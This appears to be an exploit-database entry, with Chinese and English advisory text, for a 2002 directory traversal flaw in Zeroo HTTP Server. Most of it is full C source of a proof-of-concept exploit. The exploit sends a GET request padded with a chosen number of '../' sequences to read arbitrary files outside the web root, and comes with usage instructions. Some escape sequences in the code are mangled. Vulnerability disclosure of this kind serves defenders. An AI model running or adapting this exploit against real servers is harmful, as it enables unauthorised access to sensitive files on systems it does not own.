https://www.exploit-db.com/exploits/22063
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-188

ZerooHTTPServer是一款简单快速的WEB服务器程序。ZerooHTTP对用户提交的恶意WEB请求缺少正确过滤，远程攻击者可以利用这个漏洞以WEB进程权限查看系统上任意文件内容。由于Zeroo不正确过滤WEB请求，攻击者可以提交包含多个’../’的WEB请求给Zeroo服务程序，可绕过WEBROOT目录的限制，以WEB权限查看系统上任意文件内容。造成敏感信息泄露。

source: http://www.securityfocus.com/bid/6308/info

It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request to the vulnerable server, using directory traversal sequences, it is possible for a remote attacker to access sensitive resources located outside of the web root.

An attacker is able to traverse outside of the established web root by using dot-dot-slash (../) directory traversal sequences. An attacker may be able to obtain any web server readable files from outside of the web root directory.

/*
 * zeroo httpd remote directory traversal exploit
 * proof of concept
 *      hehe, just a copy and paste from my other directory
 *      traversal exploit ;p
 * [mikecc] [http://uc.zemos.net/]
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>

#define FOO "../"

void get(int sd);

int main(int argc, char **argv)
{
        struct sockaddr_in sock;
        struct hostent *pHe;
        int sd;
        int amt;
        char * host;
        char * file;
        short port;
        char expstr[1024];
        int x;
        char * baz;

        printf("UC-zeroon");
        printf("zeroo httpd remote exploitn");
        printf("[mikecc/unixclan] [http://uc.zemos.net/]nn");
        if (argc != 5)
        {
                printf("%s host port file traverse_amount (>= 1 [keep incrementing till hit])n",argv[0]);
                return 0;
        }
        host = argv[1];
        port = atoi(argv[2]);
        file = argv[3];
	        amt = atoi(argv[4]);
        if ((pHe = gethostbyname(host)) == NULL)
        {
                printf("Host lookup error.n");
                return 0;
        }
        if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
                printf("sock() failed.n");
                return 0;
        }
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
        printf("Connecting...n");
        if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
        {
                printf("Failed to connect to %s.n",host);
                return 0;
        }
        printf("Setting up exploit string..n");
        if ((amt + 8 + strlen(file)) > 1024)
        {
                printf("Error. Limit 1024 characters.n");
                return 0;
        }
        sprintf(expstr,"GET /");
        for (x = 0; x < amt; x++)
        {
                strcat(expstr,FOO);
        }
        printf("tInserting file string..n");
        strcat(expstr,file);
        strcat(expstr,"nn");
        printf("Sending exploit string...n");
        write(sd,expstr,strlen(expstr));
        get(sd);
        close(sd);
        return 0;
}

void get(int sd)
{
        char buf[1024];
        int x;
        fd_set rset;

        FD_ZERO(&rset);
        while (1)
        {
                FD_SET(sd,&rset);
                select(sd+1,&rset,0,0,0);
                if (FD_ISSET(sd,&rset))
                {
                        if ((x = read(sd,buf,1024)) == 0)
                        {
                                printf("Connection closed by foreign host.n");
                                exit(1);
                        }
                        buf[x] = 0; /* clean out junk */
                        printf("%sn",buf);
                }
        }
}

来源:BID
名称:6308
链接:http://www.securityfocus.com/bid/6308
来源:XF
名称:zeroo-dotdot-directory-traversal(10672)
链接:http://www.iss.net/security_center/static/10672.php
来源:BUGTRAQ
名称:20021122ZerooFolderTraversalVulnerability
链接:http://cert.uni-stuttgart.de/archive/bugtraq/2002/11/msg00306.html
来源:VULNWATCH
名称:20021121ZerooFolderTraversalVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0083.html
来源：NSFOCUS
名称：3974
链接：http://www.nsfocus.net/vulndb/3974